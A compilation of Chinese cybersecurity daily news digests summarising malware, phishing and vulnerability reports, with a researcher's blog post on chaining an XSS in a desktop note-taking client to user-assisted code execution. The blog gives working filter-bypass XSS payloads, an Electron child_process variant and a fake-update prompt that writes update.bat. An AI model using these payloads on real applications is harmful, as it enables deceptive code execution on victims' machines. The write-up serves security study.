网络安全日报 2025年05月21日
1、Go语言恶意软件利用漏洞部署XMRig挖矿木马 https://thehackernews.com/2025/05/go-based-malware-deploys-xmrig-miner-on.html 安全研究人员监测到一款基于Go语言的新型恶意软件在全球范围内活跃,该软件通过扫描暴露于公网的MySQL、Tomcat及WebLogic服务端口,利用漏洞植入XMRig挖矿木马,并具备跨平台传播、持久化驻留及反检测能力。攻击链涉及三个核心组件:Dropper脚本(Bash/PowerShell)、Go语言编写的扫描器及XMRig挖矿木马,所有组件均托管在同一控制服务器上。 2、RVTools官网遭入侵导致传播Bumblebee恶意软件 https://thehackernews.com/2025/05/rvtools-official-site-hacked-to-deliver.html RVTools的官方网站被黑客入侵,攻击者上传了被篡改的安装程序,该程序会下载为Bumblebee的恶意软件。RVTools的官方站点Robware.net和RVTools.com目前处于离线状态,该公司正在紧急恢复服务。用户被建议验证安装程序的哈希值,并检查用户目录中version.dll文件是否存在异常执行情况。 3、恶意PyPI软件包利用Instagram和TikTok API验证用户账户 https://thehackernews.com/2025/05/malicious-pypi-packages-exploit.html 研究人员发现,Python Package Index (PyPI) 仓库中出现了恶意软件包,这些恶意软件包用于验证被盗电子邮件地址是否与 TikTok 和 Instagram 账户相关联。这些软件包包括 checker-SaGaF、steinlurks 和 sinnercore。checker-SaGaF 通过向 TikTok 的密码恢复 API 和 Instagram 的账户登录端点发送 HTTP POST 请求,来验证电子邮件地址是否有效。ste 4、伪造的KeePass密码管理器传播KeeLoader窃密木马 https://www.bleepingcomputer.com/news/security/fake-keepass-password-manager-leads-to-esxi-ransomware-attack/ 研究人员发现了一个恶意的KeePass安装程序,该安装程序通过Bing广告推广虚假软件网站。由于KeePass是开源软件,攻击者修改了其源代码,构建了一个被木马化的版本——KeeLoader,该版本包含密码管理和密码窃取功能。研究人员进一步调查该攻击活动后发现,攻击者已建立了一个庞大的基础设施,用于分发伪装成合法工具的恶意程序以及用于窃取凭证的网络钓鱼页面。 5、科威特遭复杂网络钓鱼攻击 https://securityonline.info/kuwait-under-attack-230-domains-used-in-sophisticated-phishing-operation/ 自2025年初起,科威特的渔业、电信、保险等关键行业持续遭受复杂的网络钓鱼攻击。攻击者利用超过230个域名,主要将基础设施部署在Aeza International Ltd的服务器上,并借助共享SSH认证密钥等关联资产实施攻击。他们注册的域名模仿真实品牌,同时伪造网站界面,例如伪造科威特国家渔业公司网站,展示海鲜产品等内容以吸引受害者。此外,攻击范围不仅限于科威特,还波及巴林等海湾地区国家。 6、Serviceai数据泄露致50万患者信息暴露 https://hackread.com/serviceaide-leak-catholic-health-patients-records/ Serviceaide公司由于Elasticsearch数据库配置错误,导致约50万名患者的信息泄露,这些信息涵盖姓名、出生日期、处方信息、社安号码等敏感内容。泄露时间跨度为2024年9月19日至11月5日,该泄露情况于11月15日被发现,不过无法排除数据已被下载或滥用的可能性。 7、高拒绝服务风险:Tornado的默认解析器暴露应用程序 https://www.anquanke.com/post/id/307576 龙卷风Python Web框架中新披露的漏洞(CVE-2025-47287)通过过度日志记录将应用程序暴露给拒绝服务(DoS)攻击。该缺陷被分配为7.5的CVSS分数,将其归类为高严重性。 8、CISA最近将Chrome漏洞标记为被积极利用 https://www.anquanke.com/post/id/307583 周四,CISA警告美国联邦机构保护其系统免受利用Chrome网络浏览器中高严重性漏洞的持续攻击。Solidlab安全研究员Vsevolod Kokorin发现了这个漏洞(CVE-2025-4664),并于5月5日在线分享了技术细节。released security updates谷歌周三发布了安全更新以修补它。 9、Auth 0-PHP SDK严重漏洞,超过1600万下载量 https://www.anquanke.com/post/id/307568 Okta已经发布了一个关键的安全咨询警告开发人员和企业使用Auth0-PHP SDK关于一个严重漏洞,该漏洞可能允许攻击者通过对会话cookie的蛮力攻击获得未经授权的访问。 10、云存储大规模数据泄露事件,全球2000亿文件暴露在公网 https://www.freebuf.com/articles/database/431635.html 网络安全公司Cyble的研究人员发出警告,多个主流云服务商因存储桶配置错误导致约2000亿份文件可被公开访问。研究人员在漏洞分析过程中,共识别出分布在七大云平台上的66万个未受保护的存储桶。 声明 以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
网络安全日报 2025年05月20日
1、Modiloader恶意软件使用伪装驱动更新进行攻击 https://cybersecuritynews.com/modiloader-malware-attacking-windows-users/ 安全公司Cyble披露,一种名为Modiloader的新型恶意软件通过伪造硬件驱动程序更新进行传播,目前已感染全球超过2.3万台Windows设备。攻击者将恶意安装包伪装成惠普、戴尔等品牌的驱动更新程序,诱导用户从钓鱼网站或被劫持的合法CDN节点下载。该恶意软件加载后,会植入模块化后门,窃取浏览器凭证、加密货币钱包信息及系统信息,并下载Cobalt Strike等工具实施横向渗透。Modiloader利用经过签名的旧版驱动文件来绕过驱动程序验证, 2、黑客利用Confluence服务器漏洞实现RDP访问和远程代码执行 https://cybersecuritynews.com/hackers-exploiting-confluence-server/ 研究人员发现了一种复杂的攻击活动,攻击者利用Atlassian Confluence服务器中已知的漏洞CVE-2023-22527来部署勒索软件。该漏洞属于模板注入漏洞,攻击者能够在未打补丁的服务器上执行任意命令,进而获得初始访问权限。在2024年6月的入侵行动中,攻击者展现出了极大的耐心,从初始漏洞利用到最终勒索软件部署,他们等待了大约62小时。攻击链始于对Confluence漏洞的利用,这一步骤允许攻击者在目标系统上执行任意命令。成功利用漏洞后,攻击者部 3、Crawlomatic插件曝高危漏洞可致网站遭远程接管 https://thecyberexpress.com/crawlomatic-plugin-hit-by-cve-2025-4389/ WordPress插件Crawlomatic Multipage Scraper Post Generator被披露存在高危漏洞(CVE-2025-4389)。攻击者可通过未授权的文件上传操作实现远程代码执行(RCE),进而完全控制受影响的网站。该漏洞源于插件中的crawlomatic_generate_featured_image()函数未对上传的文件类型进行验证,这导致攻击者能够通过构造恶意请求,直接将WebShell等恶意文件上传至服务器,且无需任何 4、Firefox零日漏洞允许攻击者执行恶意代码 https://cybersecuritynews.com/firefox-0-day-vulnerabilities/ Mozilla发布了紧急安全更新,成功修复了Firefox中的两个关键漏洞(CVE-2025-4918和CVE-2025-4919)。这些漏洞可能使攻击者能够在用户系统上执行恶意代码。攻击者可以通过诱导用户访问恶意制作的网站来利用这些漏洞,进而触发越界写入操作并执行任意代码。受影响的Firefox版本包括110.0至138.0.3,同时,受影响的Firefox ESR版本包括102.0至128.10.0。这些漏洞的CVSS评分为8.8分,表明其风险极高。因此,用户应立即将 5、大众汽车连接应用程序漏洞导致车主个人数据泄露 https://cybersecuritynews.com/volkswagen-car-hacked/ 安全研究员Vishal Bhaskar发现,大众汽车的My Volkswagen应用程序存在严重安全漏洞。攻击者可以利用车辆的VIN号码,通过简单的手段访问用户数据,而该号码通常可在大多数汽车的挡风玻璃上看到。研究人员指出了三个关键安全漏洞:内部凭证泄露、通过VIN号暴露的个人详细信息以及完整的车辆服务历史记录访问权限。这些漏洞可能使潜在攻击者获取车辆位置、发动机健康状况、燃油统计和轮胎压力数据;获取车主的个人信息,包括家庭住址和驾驶执照详情;查看完整的车辆服务历史记录以及客户投诉;甚至 6、美国FBI警告:AI语音诈骗正冒充政府高官行骗 https://hackread.com/fbi-warn-ai-voice-scams-impersonate-us-govt-officials/ FBI警告AI语音伪造技术被用于冒充美国高官实施钓鱼攻击,通过短信和语音诱导点击恶意链接窃取信息,威胁政府官员及国家安全。AI技术滥用使诈骗更逼真,专家提醒警惕伪造号码,现有系统难识别。 7、glibc漏洞威胁数百万Linux系统安全 可导致任意代码执行 https://securityonline.info/glibc-vulnerability-cve-2025-4802-puts-millions-of-linux-systems-at-risk-of-code-execution/ GNU C库(glibc)漏洞CVE-2025-4802影响静态setuid二进制文件,错误处理LD_LIBRARY_PATH可能导致执行恶意代码。需升级至glibc 2.39并审计静态setuid程序。 8、Windows远程桌面网关UAF漏洞可导致远程代码执行 https://cybersecuritynews.com/windows-remote-desktop-gateway-uaf-vulnerability/ 微软RD Gateway高危漏洞(CVE-2025-21297)可致远程代码执行,影响2016-2025版Windows Server。漏洞由线程同步问题引发,CVSS评分8.1。微软已发布补丁修复,建议立即更新并监控异常连接。 9、iOS内核漏洞可在非越狱状态下修改文件系统 https://securityonline.info/poc-released-ios-kernel-flaw-allows-file-system-modification/ 苹果修复内核漏洞CVE-2025-24203(dirtyZero/mdc0),该漏洞允许应用修改系统文件,影响iOS 16.0-18.3.2版本,利用内存管理标志位绕过权限检查,已被用于系统定制工具,存在安全风险。 10、ChatGPT推出Codex,一种用于软件编程的AI工具 https://www.anquanke.com/post/id/307513 OpenAI正在为ChatGPT推出“Codex”,ChatGPT是一个AI代理,可自动执行软件工程师的编程任务。 声明 以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
网络安全日报 2025年05月19日
1、攻击者使用钓鱼邮件攻击拉美六国 https://thehackernews.com/2025/05/horabot-malware-targets-6-latin.html 安全研究人员发现,新型Horabot银行木马通过伪装成政府税务通知的钓鱼邮件,在巴西、墨西哥、阿根廷等六个拉丁美洲国家进行攻击。该恶意软件利用伪造的Windows更新弹窗诱导用户安装后门程序,一旦安装,便能够窃取浏览器的Cookie、记录键盘输入以及截取屏幕画面,甚至远程操控设备发起银行转账。巴西网络安全中心已确认,超过200家企业网络遭到渗透,部分金融机构的单笔损失高达37万美元。趋势科技通过溯源发现,攻击基础设施与巴西地下犯罪论坛存在技术关联,推测 2、新型.NET加载器持续攻击Windows系统投递恶意载荷 https://cybersecuritynews.com/new-net-multi-stage-loader-attacking-windows-systems/ 自2022年初以来,一款复杂的.NET恶加载器持续对Windows系统发起攻击,它通过三阶段部署机制来投递窃密木马、远程控制木马等恶意载荷。在初始阶段,该加载器伪装成无害的.NET可执行文件,其中包含加密组件;进入第二阶段后,它利用.NET DLL来处理参数,并从位图资源中解密出恶意代码;到了第三阶段,它会在内存中部署最终载荷,以此避免被检测。最新变种采用了位图资源来隐藏代码,并应用了复杂混淆技术,从提升隐蔽性。该加载器主要用 3、Coinbase遭未知网络攻击导致客户数据泄露 https://thehackernews.com/2025/05/coinbase-agents-bribed-data-of-1-users.html 加密货币交易所Coinbase披露,其系统遭未知网络犯罪分子入侵,导致少量客户账户数据被窃取。经调查发现,攻击者以现金为诱饵,诱使一小部分海外客户协助从客户支持工具中复制数据,这些客户在不知情的情况下充当了攻击者的“代理”。攻击者的核心目的是收集客户列表,伪装成Coinbase官方身份,进而欺骗客户交出加密货币资产。2025年5月11日,攻击者向Coinbase发起勒索,索要2000万美元赎金,并声称掌握部分客户账户信息及内部文件,截至目 4、HTTPBot僵尸网络发起200余次精准DDoS攻击 https://thehackernews.com/2025/05/new-httpbot-botnet-launches-200.html 一种名为HTTPBot的新型僵尸网络恶意软件引发了网络安全研究员的关注。HTTPBot通过高度模拟HTTP洪水攻击以及采用动态特征混淆技术,成功绕过了传统基于规则的检测机制。该恶意软件基于Golang语言开发,专门针对Windows系统。在发起攻击时,它会隐藏图形用户界面,操纵Windows注册表以实现开机自启动,并与命令控制服务器建立联系,根据接收到的指令对特定目标发起HTTP洪水攻击,同时还支持多种攻击模块。自2025年4月起至相关报道发布时,HT 5、攻击者通过钓鱼邮件部署Remcos远程控制木马 https://thehackernews.com/2025/05/fileless-remcos-rat-delivered-via-lnk.html 网络安全公司Qualys发现了一起针对全球企业的钓鱼攻击活动,攻击者使用内存驻留技术部署了Remcos远程控制木马。在此次攻击中,攻击者利用伪装成税务文档的ZIP文件来分发恶意LNK文件,这些LNK文件的图标被伪装成PDF样式。攻击者还通过mshta.exe执行混淆的HTA文件,触发多阶段的PowerShell脚本加载器,最终在内存中直接运行Remcos远程控制木马。本次攻击的目标涵盖了金融、制造行业以及政府机构。 6、FrigidStealer伪造Safari更新攻击macOS窃取数据 https://hackread.com/frigidstealer-malware-macos-fake-safari-browser-update/ 2025年2月,首次曝光的FrigidStealer恶意软件正在全球范围内通过伪造浏览器更新的方式攻击macOS用户。该恶意软件属于Ferret家族,由TA2726和TA2727黑客组织联合运营。它通过受感染的网站注入恶意JavaScript代码,诱使用户下载伪装成Safari或Chrome更新的恶意DMG文件。攻击过程中,该恶意软件利用AppleScript骗取用户密码,以此绕过Gatekeeper安全机制,并安装Bundle ID为co 7、越来越多的勒索组织使用Skitnet后渗透框架实施网络攻击 https://www.bleepingcomputer.com/news/security/ransomware-gangs-increasingly-use-skitnet-post-exploitation-malware/ 安全公司Prodaft披露了一款新型恶意软件Skitnet(代号“Bossnet”),该软件正在成为主流勒索团伙的标准后渗透工具。自2024年4月起,该框架在地下论坛RAMP上出售,此后已被BlackBasta、Cactus等至少7个勒索组织用于实际攻击。攻击者通过Rust加载器部署经过ChaCha20加密的Nim二进制文件,建立DNS反向Shell以实现隐蔽通信 8、以色列抓获Nomad Bridge跨链协议攻击主犯 https://www.bleepingcomputer.com/news/legal/israel-arrests-new-suspect-behind-nomad-bridge-190m-crypto-hack/ 以色列国家网络犯罪部门在特拉维夫逮捕了涉嫌策划2024年Nomad Bridge跨链协议攻击的主犯“K1”。此次攻击导致价值1.9亿美元的加密货币被盗。嫌疑人通过逆向工程该协议的智能合约,利用重入攻击漏洞劫持了跨链验证节点,从而在以太坊与Avalanche网络之间伪造资产转移凭证。执法部门联合FBI和Chainalysis公司追踪发现,被盗资金通过Railgun混币器和Chan 9、微软KB5037771更新致Win10 22H2部分设备BitLocker异常 https://www.bleepingcomputer.com/news/microsoft/microsoft-confirms-may-windows-10-updates-trigger-bitlocker-recovery/ 微软确认,KB5037771更新导致部分运行Windows 10 22H2版本的设备触发了BitLocker恢复模式。该问题是由UEFI固件与TPM 2.0芯片之间的交互异常引起的,更新后系统错误地判定安全启动配置发生了变更,进而强制要求用户输入48字符的恢复密钥。受影响的设备主要集中在戴尔OptiPlex 7090、惠普EliteDesk 800 G6以及联 10、黑客组织Scattered Spider开始攻击美国零售商 https://hackread.com/hackers-targeting-us-retailers-uk-attacks-google/ 谷歌网络安全专家发出警告,此前针对英国零售商发动攻击的Scattered Spider黑客组织,如今已开始将目标转向美国零售商。此次攻击美国零售商的黑客所使用的技术和程序,与之前英国零售商遭遇攻击时攻击者所采用的手段相似。Scattered Spider(也被称为UNC3944)是近期英国哈罗德百货、合作集团以及马莎百货遭受攻击事件的主要嫌疑人。自2023年初以来,UNC3944已针对多个行业发动了攻击,这些行业包括技术、电信、金融服务、业务流程外包、 声明 以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
网络安全日报 2025年05月16日
1、“游蛇”黑产利用仿冒的WPS Office下载站传播远控木马 https://mp.weixin.qq.com/s/ZsOJzR8zRuomloJAYr6XsA 安天CERT发现“游蛇”黑产利用仿冒的WPS Office下载站传播远控木马,若用户下载该网站的WPS Office,实际下载的是托管在OSS中的虚假安装程序。该程序执行后,在临时文件夹%temp%中释放执行一个正常的WPS安装程序,以此迷惑用户,并在C:\ProgramData文件夹中释放三个文件,执行其中的Shine.exe程序后加载恶意libcef.dll文件,该DLL读取1.txt文件,从而在内存中执行原名称为“Install.dll”的文件,调用其Shellex导出函数,最终执行Gh 2、APT28利用MDaemon零日漏洞攻击政府邮件服务器 https://thehackernews.com/2025/05/russia-linked-apt28-exploited-mdaemon.html 网络安全公司ESET发现,与俄罗斯有关的APT28组织自2023年起利用包括MDaemon在内的多个网络邮件服务器漏洞开展间谍活动,主要针对东欧政府和防务公司,同时也波及非洲、欧洲和南美的政府机构。攻击者通过电子邮件发送包含跨站脚本(XSS)攻击的恶意内容,诱使目标在易受攻击的邮件门户中打开邮件,进而在浏览器中执行恶意JavaScript代码。成功利用漏洞后,攻击者可窃取网络邮件凭证、邮件内容和联系人信息。 3、恶意npm包利用Unicode隐写术与谷歌日历分发载荷 https://thehackernews.com/2025/05/malicious-npm-package-leverages-unicode.html 研究人员发现了一个名为“os-info-checker-es6”的恶意软件包,该软件包伪装成操作系统信息工具,利用Unicode隐写术来隐藏初始恶意代码,并通过谷歌日历活动短链接充当动态下载器,以此投放下一阶段的有效载荷。这个恶意软件包由用户“kim9123”发布,截至5月15日,已被下载2001次。其关联的依赖包(如“skip-tot”)以及下游组件(如“vue-dev-serverr”)进一步扩大了攻击面。 4、CTM360发现针对Meta商业用户的钓鱼攻击激增 https://thehackernews.com/2025/05/ctm360-identifies-surge-in-phishing.html 安全公司CTM360发现了一项名为“Meta Mirage”的全球性钓鱼攻击活动,该活动专门针对使用Meta商业套件(Business Suite)的企业用户,旨在劫持高价值账户(例如广告管理账户及品牌官方页面)。攻击者伪装成Meta官方,发送虚假通知,声称用户存在政策违规、账户将被停用或需要进行紧急验证,以此诱导用户通过钓鱼页面泄露密码、一次性验证码(OTP)以及浏览器Cookie。截至报告发布时,已发现超过14,000个恶意URL,其中78 5、攻击者利用三星MagicINFO 9漏洞部署Mirai僵尸网络 https://thehackernews.com/2025/05/samsung-patches-cve-2025-4632-used-to.html 三星MagicINFO 9 Server被曝存在一个高危路径遍历漏洞(CVE-2025-4632),该漏洞允许攻击者以系统权限向任意文件写入内容。此漏洞实际上是2024年已修复的CVE-2024-7399漏洞的补丁绕过漏洞。自4月30日SSD Disclosure公开该漏洞的概念验证(PoC)后,它迅速被黑产组织利用。研究人员发现,攻击者利用此漏洞部署了Mirai僵尸网络。 6、利用Bitpixie漏洞可在数分钟内绕过BitLocker加密 https://www.freebuf.com/articles/database/431192.html 安全研究人员近日展示了一种纯软件技术,可在无需物理工具(如螺丝刀、焊枪)或硬件破解的情况下,成功绕过微软BitLocker加密防护。通过利用名为Bitpixie(CVE-2023-21563)的漏洞,红队成员与攻防安全专家能够从内存中提取BitLocker卷主密钥(VMK),在五分钟内完整解密受保护的Windows设备。Compass Security研究员Marc Tanner在红队评估报告中指出:"该漏洞利用过程具有非侵入性,既不需要永久性设备改造,也无需获取完整磁盘映像"。 7、Node.js 高危漏洞警报:可导致远程系统崩溃 https://www.freebuf.com/articles/system/431156.html Node.js团队近日发布重要安全公告,针对24.x、23.x、22.x和20.x版本系列推出关键更新。这些补丁修复了从低危到高危的一系列安全漏洞。 8、Windows远程桌面网关漏洞可被攻击者利用触发拒绝服务 https://www.freebuf.com/articles/system/431096.html 微软安全响应中心(MSRC)已发布重要安全更新,修复Windows远程桌面网关(RD)服务中的一个高危漏洞(CVE-2025-26677)。该漏洞可能允许未经授权的攻击者触发拒绝服务(DoS)条件,潜在影响企业环境中的远程访问能力。 9、新币担保:涉84亿美元加密犯罪、杀猪盘及洗钱黑市曝光 https://www.freebuf.com/news/431135.html 自2022年以来,一个名为“新币担保(Xinbi Guarantee)”的Telegram交易平台促成的交易金额不低于84亿美元,成为继汇旺担保(HuiOne Guarantee)之后被曝光的第二大黑市平台。区块链分析公司Elliptic报告显示,该平台商户公然兜售技术工具、个人数据及洗钱服务。 10、欧盟新漏洞数据库将作为CVE计划的补充而非竞争者 https://www.csoonline.com/article/3984312/new-eu-vulnerability-database-will-complement-cve-program-not-compete-with-it-says-enisa.html 欧盟推出漏洞数据库EUVD,作为CVE计划的补充,聚焦欧盟关键漏洞,强化网络安全。旨在提升欧洲自主防护能力,但引发行业对多源数据复杂性和CVE权威性的担忧。 声明 以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
从XSS到“RCE”的PC端利用链构建
前言 先铺垫一下。笔者有一个习惯,懒得记各种命令和payload,手工渗透测试时,遇到比较长的payload的情况下,不想一个一个地去手敲命令,于是我之前就在github上想寻找一个类似于记事本的软件,但是最好和我的记录命令的需求适配,于是就找到了一位师傅写的开源项目,一个专门用来记录命令的记事本,一直沿用至今,很方便哈哈 偶然邂逅 昨天,我在逛一些技术帖子的时候,看到一位大师傅分享的XSS payload,当时觉得这个payload我没咋见过捏,于是就想着来分析分析,我们看看这个payload妙在哪些地方? <input style=content-visibility:auto oncontentvisibilityautostatechange="alert(1)"> 1. 利用冷门事件,规避黑名单过滤 经典绕过手法,使用冷门事件规避黑名单,oncontentvisibilityautostatechange 是一个与 content-visibility CSS属性关联的事件,很少被XSS防御规则收录。传统过滤器通常针对常见事件(如onload、onerror)。于是此事件因冷门性更易绕过检测。并且,当元素的content-visibility状态如从隐藏变为可见时,事件会自动触发,无需用户交互,就能实现"静默"攻击。 2. 合法CSS属性掩护恶意逻辑 合法的样式属性content-visibility: auto 是标准的性能优化CSS属性,用于延迟渲染非视口内容。该属性本身无害,可轻松通过内容安全策略(CSP)或过滤器的白名单检查。样式与事件逻辑紧密结合,攻击行为被隐藏在合法功能中 3. input低风险标签优势 使用<input>标签相比于<script>或<img>等高风险标签,<input>通常被视为安全元素,可能会被更大程度地允许在用户输入中使用(如评论框),从而绕过标签黑名单。 于是,这么好的payload,按照笔者的习惯那肯定得记录下来呀,又多积累了一个绕过的payload。 于是我把这个payload贴到这个工具上去(windows客户端版本) 结果,惊喜出现了,这个客户端居然直接弹窗了,执行了该payload 有点意思 临时抱佛脚 XSS在web端的利用面其实不算很多,盗cookie,钓鱼,挂马,水坑,结合CSRF打组合拳,蠕虫等等,但是客户端的XSS利用面就很广了,在一定条件下甚至能直接RCE! 客户端的XSS大致能怎么利用呢?我也不会,PC端的东西还没有系统学习过,问一下AI呗,主打一个现学现用哈哈哈(大佬们轻喷) 下面简单总结一下,抛砖引玉: 1. 系统级权限逃逸(RCE) Electron/Node.js场景 若客户端基于Electron框架且未启用nodeIntegration: false等安全配置,XSS可直接调用child_process模块执行系统命令。 示例:<script>require('child_process').exec('calc.exe')</script>弹出计算器 Java WebView/JNI调用: Android WebView若启用setJavaScriptEnabled(true)并绑定Java接口,XSS可通过反射调用敏感API。 2. 本地敏感数据窃取 本地文件系统遍历: 利用FileReader/fetch读取客户端配置文件(如file://协议访问),窃取数据库凭证或加密密钥。 案例:读取Electron应用的localStorage.json或IndexedDB数据。 剪贴板劫持: 监控document.oncopy/onpaste事件,篡改加密货币钱包地址实现资产转移。 3. 硬件设备控制 摄像头/麦克风滥用: 通过navigator.mediaDevices.getUserMedia()静默启用设备,实现监控。 蓝牙/USB渗透: 调用客户端绑定的硬件API(如Web Bluetooth),扫描配对设备并注入恶意固件。 4. 客户端供应链污染 自动更新劫持: 篡改客户端自动更新逻辑(如替换update.json),强制下载捆绑恶意代码的版本。 插件系统攻击: 针对插件化架构(如VSCode扩展),通过XSS注入恶意插件代码实现持久化。 5. 横向移动与组合攻击 自定义协议滥用(Deep Link): 利用myapp://协议调用其他应用,结合已知漏洞链扩大攻击面(如启动存在RCE漏洞的PDF阅读器)。 内存漏洞触发: 通过XSS精准覆盖缓冲区,触发客户端依赖库的0day漏洞(如旧版Chromium漏洞)。 6. 社会工程增强 高仿系统弹窗: 利用客户端GUI特性伪造系统权限请求窗口(如"输入密码以更新"),诱导用户泄露敏感信息。 本地网络探测: 通过WebRTC获取内网IP,扫描局域网设备(如路由器管理界面),结合默认凭据进一步渗透。 曲线救国 一下列举了这么多利用思路,好多我也不会哈哈,不过没关系,遇到了再去利用再去深入学习嘛 于是我尝试看看我这个案例能不能RCE呢…… 其实最直接RCE的方式就是,当客户端基于Electron框架且未启用nodeIntegration: false等安全配置时,直接就能构造出RCE的payload了,而且可以做到无感RCE,就是不需要用户有过多的交互。 <input style=content-visibility:auto oncontentvisibilityautostatechange="require('child_process').exec('calc.exe')"> 但是……很遗憾,这个工具不是基于Electron框架开发的,上面的payload不适用。那么就基本无法实现无感RCE了 不过可以这样,曲线救国,实现一个比较鸡肋的"RCE",就是需要用户的一些交互才能完成。 比如,写入一个bat文件,取名叫什么update.bat,欺骗用户保存bat文件,并点击运行,严格来说不能算真正的RCE,因为客户端的RCE强调无感,我这个只能算曲线救国 我们直接构造一个写入bat文件的payload(但是需要用户手动保存) <input style=content-visibility:auto oncontentvisibilityautostatechange="(async()=>{const f=await window.showSaveFilePicker({suggestedName:'update.bat',types:[{accept:{'application/bat':['.bat']}}]});const w=await f.createWritable();await w.write('start /min calc.exe');await w.close();})()">(async()  const f = await window.showSaveFilePicker({    suggestedName: 'update.bat',    types: [{accept: {'application/bat': ['.bat']}}] });  const w = await f.createWritable(); //创建可写流,f.createWritable()生成写入流,避免一次性加载内容到内存。  await w.write('start /min calc.exe'); //写入恶意命令,start /min calc.exe 会以最小化窗口启动计算器,实际攻击中可替换为恶意脚本  await w.close(); })() 简单分析一下payload的逻辑: 用到的核心API是showSaveFilePicker 他是现代浏览器API,用于请求用户保存文件,弹出系统级保存对话框。 关键参数 suggestedName: 'update.bat' types: [{accept: {'application/bat': ['.bat']}}] 使用文件名伪装suggestedName: 'update.bat'利用系统更新文件的命名习惯降低用户戒心 MIME类型欺骗,声明types: [{accept: {'application/bat'类型,绕过对text/plain或application/octet-stream的过滤 扩展名锁定,强制指定types: [{accept: {'application/bat': ['.bat']}}]扩展名,确保文件可执行性 恶意内容注入,使用createWritable + write的方式来写入文件 const w = await f.createWritable(); 流式写入,采用WritableStream API避免内存中拼接完整文件内容,规避基于内容长度的检测 现在效果是这样的     1. 点击payload标签栏,就能触发xss代码,自动弹窗资源管理器,保存update.bat文件,但是这一步需要用户确认保存     2. 保存之后,还是需要用户自己去运行bat文件才能弹出计算器     3. 很鸡肋是不是哈哈,于是我们需要加入弹窗,欺骗一下下受害者 <input style="content-visibility:auto" oncontentvisibilityautostatechange="(async()=>{if(confirm('是否保存更新文件 update.bat?')){const f=await window.showSaveFilePicker({suggestedName:'update.bat',types:[{accept:{'application/bat':['.bat']}}]});const w=await f.createWritable();await w.write('start /min cal     4. 这样要稍微好一点点 <input style="content-visibility:auto" oncontentvisibilityautostatechange="(async()=>{alert('当前版本过旧,可能存在漏洞险,请下载更新程序更新到最新版本!'); const f=await window.showSaveFilePicker({suggestedName:'update.bat',types:[{accept:{'application/bat':['.bat']}}]});const w=await f.createWritable();await w.write('start /mi     5. 点击payload标签栏,触发xss代码弹窗,提示版本老旧,存在漏洞风险更新     6. 只有一个按钮,用户不得不点确定,然后就会自动写入update.bat文件 但是需要用户手动保存     7. 然后保存之后,就会弹窗提示用户执行     8. 假如用户执行了,那么就能执行里面的恶意代码了(需要免杀) 这个案例再次印证了安全领域的"海因里希法则"——每起严重漏洞背后,必然有29次轻微漏洞和300起未遂先兆。那些看似无害的XSS payload记录行为,恰恰成为了攻击链的关键支点。当我们惊叹于APT攻击的精妙时,不妨多审视日常开发中的"便利性妥协",或许正是这些细微处的风险累积,最终筑成了攻防天平倾斜的转折点。 最后挣扎 其实,我感觉想要做到无感RCE还有一种更直接的办法,就是直接去审计这个项目的源码啊!可以找找前后端有没有什么危险函数,能够通过js调用执行,并且能逃逸出沙箱,执行系统命令的地方。经过对后端代码的审计,没有发现什么可控的地方,唯一可控的就是配置文件的内容,但后端都写死了,无明显的危险操作,无法无感RCE 后记 ok,到此全篇结束。本文没有什么太大的技术含量,纯粹比较有趣(对我来说),甚至是现学现卖的哈哈。短期内,其实用处不是很大,但是我个人觉得,往往正是这些无用之用,这些学安全路上的小发现、小惊喜才是支撑我们夜以继日、废寝忘食地搞安全的最大动力!也正是这些无用之用,我们才一点一点成长成如今的模样…… 晚辈技术浅陋,行文难免不当,还请师傅们多多指教!
网络安全日报 2025年05月15日
1、恶意PyPI包伪装Solana工具窃取开发者密钥 https://thehackernews.com/2025/05/malicious-pypi-package-posing-as-solana.html 安全研究人员发现,Python包索引(PyPI)上存在一个名为“solana-token”的恶意软件包。该包伪装成Solana区块链开发工具,通过伪造的register_node()函数窃取开发者的源代码及敏感密钥。自2024年4月上传至PyPI后,该恶意包累计被下载761次。在安装时,该恶意软件会扫描开发者Python执行堆栈中的所有文件,提取其中包含的加密密钥、API凭证等敏感信息,并通过硬编码的IP地址将数据外泄。攻击者专门针对那 2、攻击者使用PyInstaller工具在macOS上部署窃密木马 https://www.jamf.com/blog/pyinstaller-malware-jamf-threat-labs/ 安全研究人员发现新型恶意软件活动滥用PyInstaller工具,针对macOS设备发起攻击。攻击者将恶意Python脚本打包为合法应用程序,通过钓鱼邮件或虚假下载链接进行传播。本次攻击活动中攻击者主要窃取密码、浏览器Cookie、剪贴板内容及加密货币钱包等信息,主要针对的目标有企业员工、开发人员及加密货币用户,同时攻击者还会诱导用户禁用Gatekeeper安全防护。 3、Fortinet修复FortiVoice系统中远程代码执行漏洞 https://thehackernews.com/2025/05/fortinet-patches-cve-2025-32756-zero.html Fortinet修补了一个编号为CVE-2025-32756的关键安全漏洞,该漏洞曾被利用来攻击FortiVoice企业电话系统。此漏洞的产生源于FortiVoice、FortiMail、FortiNDR、FortiRecorder和FortiCamera等产品中存在的栈溢出问题。攻击者能够通过精心构造的HTTP请求,远程执行任意代码或命令。Fortinet已观察到该漏洞在FortiVoice系统中被利用的情况,但并未透露攻击规模以及攻击者的 4、英特尔CPU新型漏洞可泄露特权内存敏感数据 https://www.freebuf.com/articles/system/430921.html 现代英特尔CPU普遍存在的新型"分支特权注入"漏洞(Branch Privilege Injection),可使攻击者从操作系统内核等特权软件分配的内存区域窃取敏感数据。这些内存区域通常存储着密码、加密密钥、其他进程内存及内核数据结构等关键信息,其防护至关重要。 5、Ivanti ITSM 曝出高危认证绕过漏洞,可获取管理员权限 https://www.freebuf.com/articles/es/430937.html Ivanti公司已发布安全更新,修复其Neurons for 